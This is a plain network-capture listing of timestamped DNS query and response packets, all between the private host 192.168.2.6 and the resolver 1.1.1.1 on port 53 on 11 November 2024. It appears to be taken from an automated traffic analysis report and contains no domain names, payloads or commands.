                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.499794006 CET53612801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.499809980 CET53496261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.499821901 CET53573931.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.500787020 CET53644981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.502948046 CET4941553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.504158974 CET6181953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.505795002 CET6285953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.505906105 CET6254353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.506099939 CET6538153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.506375074 CET5191053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.506792068 CET53550191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.508135080 CET53646421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.508774996 CET53586951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.509881973 CET53560431.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.513251066 CET5873853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.513957977 CET5684753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.513969898 CET53494151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.514401913 CET53618191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.515167952 CET53653811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.515984058 CET53519101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.517786980 CET53655121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.521738052 CET4965753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.522444010 CET53587381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.524652958 CET53568471.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.528047085 CET53634291.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.531069994 CET6161553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.531518936 CET5061253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.531826973 CET5924953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.532458067 CET6109653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.532666922 CET6277253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.532845974 CET5992853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.533041954 CET5840653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.533164024 CET6071753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.533200979 CET5410053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.535475969 CET5759853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.535737038 CET6225453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.537125111 CET53625431.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.537331104 CET53628591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.540783882 CET53616151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.542881012 CET53575981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.543131113 CET53541001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.543143034 CET53592491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.543332100 CET53599281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.543672085 CET53607171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.545919895 CET5263253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.552084923 CET5320753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.553170919 CET53496571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.556801081 CET53526321.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.562680006 CET53610961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.562694073 CET53506121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.562793970 CET5232453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.563054085 CET6489653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.563222885 CET5358453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.563894033 CET5456253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.564805984 CET53627721.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.565346003 CET5824953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.567540884 CET53622541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.568643093 CET5829753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.570242882 CET5937553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.573296070 CET53648961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.573398113 CET53535841.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.573518038 CET53523241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.574367046 CET53545621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.576401949 CET53582971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.581492901 CET5274253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.583431959 CET53532071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.592668056 CET53527421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.596210957 CET53582491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.601303101 CET53593751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.611032963 CET6183153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.611291885 CET6140453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.611490011 CET5837053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.616173983 CET5155353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.616493940 CET5780153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.616669893 CET5139053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.617037058 CET5750353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.617790937 CET6423053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.618241072 CET5470153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.618936062 CET6233253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.619049072 CET5142153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.619122982 CET5363853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.619259119 CET5511953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.622522116 CET53618311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.622534990 CET53583701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.626885891 CET53513901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.628753901 CET53547011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.630258083 CET53551191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.630373001 CET53515531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.632478952 CET53578011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.642530918 CET53614041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.648618937 CET53642301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.648895025 CET53575031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.650338888 CET53536381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.650352955 CET53514211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.651088953 CET53623321.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.939205885 CET53584061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.400434017 CET5584853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.400835991 CET6469653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.403865099 CET5103553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.411246061 CET53646961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.411264896 CET53558481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.413199902 CET5643853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.416704893 CET5689353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.422676086 CET53564381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.434925079 CET4968053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.435077906 CET5745453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.435734034 CET5748753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.435889006 CET53510351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.437319040 CET5538453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.437546968 CET5008653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.440196037 CET53568931.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.443262100 CET5357153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.443675995 CET53574871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.444561958 CET53496801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.444983006 CET53574541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.446749926 CET53553841.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.448077917 CET53500861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.449141979 CET6271253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.451913118 CET5450453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.454118013 CET53535711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.456053019 CET6016453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.456732988 CET6160353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.458127975 CET6295953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.458564997 CET5385353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.458807945 CET53627121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.460107088 CET5039053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.460827112 CET6463353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.462630987 CET53545041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.466062069 CET53601641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.466531992 CET53616031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.469893932 CET6497553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.469975948 CET53538531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.470179081 CET53503901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.470716000 CET5922853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.471797943 CET5076553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.471995115 CET5697753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.472156048 CET5107353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.472409964 CET5657053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.475270033 CET53629591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.476733923 CET5898853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477016926 CET5627853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477226019 CET5494553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477245092 CET5119553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477442980 CET5564153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477581978 CET6115853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477641106 CET4992553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477782965 CET5375553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477953911 CET5618953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.478113890 CET5474953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.478399992 CET6438853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.481293917 CET53592281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.481616020 CET53507651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.481803894 CET53510731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.482194901 CET53565701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.485016108 CET53611581.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.486852884 CET53556411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.486963034 CET53499251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.487257004 CET53561891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.487473965 CET53537551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.487483978 CET53643881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.487880945 CET53589881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.489917994 CET53569771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.490645885 CET53646331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.495208979 CET53511951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.495336056 CET5643153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.495898962 CET5040253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496181965 CET4938553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496411085 CET6417153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496603966 CET5284853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496630907 CET5700253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496788979 CET6521453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496970892 CET5236153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497080088 CET6185453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497157097 CET5536653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497245073 CET5187953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497384071 CET5061753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497607946 CET6279253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497771025 CET5428753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497936964 CET5883353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.498084068 CET5502753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.498217106 CET5296253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.500942945 CET53649751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501128912 CET5472053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501174927 CET6407153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501405954 CET5674253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501431942 CET6120753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501810074 CET5791453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.502006054 CET6324653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.502130985 CET5495353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.505413055 CET53652141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.506383896 CET53493851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.507105112 CET53523611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.507116079 CET53528481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.507128000 CET53618541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.507234097 CET53518791.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.507277966 CET53641711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.507436991 CET53562781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.507448912 CET53506171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.507563114 CET53549451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.508382082 CET53529621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.508980036 CET53627921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.509195089 CET53612071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.509529114 CET53547491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.509587049 CET5047853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.510622025 CET6107653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.510687113 CET6261653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.511758089 CET53549531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.511770010 CET53640711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.512567997 CET53579141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.518148899 CET5754253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.519071102 CET53504781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.521226883 CET53626161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.525950909 CET53504021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.527004004 CET53570021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.527254105 CET53575421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.527498007 CET53564311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.527877092 CET53553661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.528024912 CET53542871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.528111935 CET53588331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.529417992 CET53550271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.532030106 CET53547201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.532418013 CET53567421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.533590078 CET53632461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.542565107 CET53610761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.833403111 CET5639653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.834949017 CET5393053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.837419033 CET6101053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.838953972 CET6523053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.839664936 CET5693853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.841047049 CET5930753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.841763020 CET5367753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.846122980 CET53563961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.848392963 CET53539301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.857395887 CET53593071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.858802080 CET53536771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.858962059 CET5692753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.859544992 CET5342353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.860491037 CET6317053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.862023115 CET53652301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.862391949 CET5921353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.865293026 CET6450153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.865422964 CET6550453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.868166924 CET6318853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.871754885 CET6369053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.871882915 CET6052753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.871984959 CET53534231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.871999979 CET53631701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.872111082 CET53610101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.872580051 CET5801753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.874620914 CET53569381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.879180908 CET53645011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.880657911 CET53631881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.882071972 CET6053153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.882488012 CET5890353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.882709026 CET5120753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.883059025 CET4962353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.884946108 CET53605271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.885658026 CET53580171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.886920929 CET5124653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.890497923 CET5286753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.890862942 CET6444653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.891177893 CET53636901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.891947031 CET5197253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.893291950 CET53605311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.895018101 CET53592131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.896771908 CET6069653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.897557974 CET5887553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.897732973 CET5030653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.897948027 CET5377753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.898345947 CET53655041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.903822899 CET53644461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.911248922 CET53606961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.912098885 CET6212653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.912743092 CET53528671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.913491964 CET53503061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.914238930 CET6288153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.918090105 CET53589031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.918869019 CET53512071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.920059919 CET53496231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.923845053 CET53512461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.924154043 CET53621261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.926141977 CET53569271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.927148104 CET53628811.1.1.1192.168.2.6
